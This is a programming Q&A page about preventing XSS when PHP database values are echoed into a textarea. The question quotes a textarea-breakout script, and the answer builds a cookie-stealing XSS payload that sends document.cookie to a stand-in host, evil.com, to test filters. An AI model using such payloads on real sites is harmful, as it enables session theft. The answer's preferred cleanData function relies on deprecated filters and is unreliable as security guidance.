Home/ Questions/Q 7847143
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-06-02T17:47:56+00:00

What are the best methods of sanitizing values from a database (in php) if

  • 0

What are the best methods of sanitizing values from a database (in php) if they are to be used in inputs like textareas?

For example, when inserting data, I can strip tags and quotes and replace them with html char codes and then use mysql_real_escape_string right before insertion.

When retrieving that data back, I need it to show up in a textarea. How can I do this and still avoid XSS? (Ex. you could easily type in 

</textarea><script type='text/javascript'> Malicious Code</script><textarea>

) and cause problems.

Thanks!

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    I think i would prefer a combo of filter_var and url_decode if you want to use a pure simple php Solution

    Reason

    Imagine an impute like this 

    $maliciousCode = "<script>document.write(\"<img src='http://evil.com/?cookies='\"+document.cookie+\"' style='display:none;' />\");</script> I love PHP";

    If i use strip_tags

    var_dump(strip_tags($maliciousCode));

    Output

    string 'document.write("' (length=16)

    if i use htmlspecialchars 

    var_dump(htmlspecialchars($maliciousCode));

    Output

    string '&lt;script&gt;document.write(&quot;&lt;img src='http://evil.com/?cookies='&quot;+document.cookie+&quot;' style='display:none;' /&gt;&quot;);&lt;/script&gt; I love PHP' (length=166)

    My Choice

    function cleanData($str) {
    $str = urldecode ($str );
    $str = filter_var($str, FILTER_SANITIZE_STRING);
    $str = filter_var($str, FILTER_SANITIZE_SPECIAL_CHARS);
    return $str ;
}

$input = cleanData ( $maliciousCode );
var_dump($input);

    Output

     string 'document.write(&#38;#34;&#38;#34;); I love PHP' (length=46)

    If form is using GET instead of POST some can till escape if it is url encoded , you are able to get a minimal information and make sure the final text is harmless

    The are also enough class online to help you do filter see

    • 0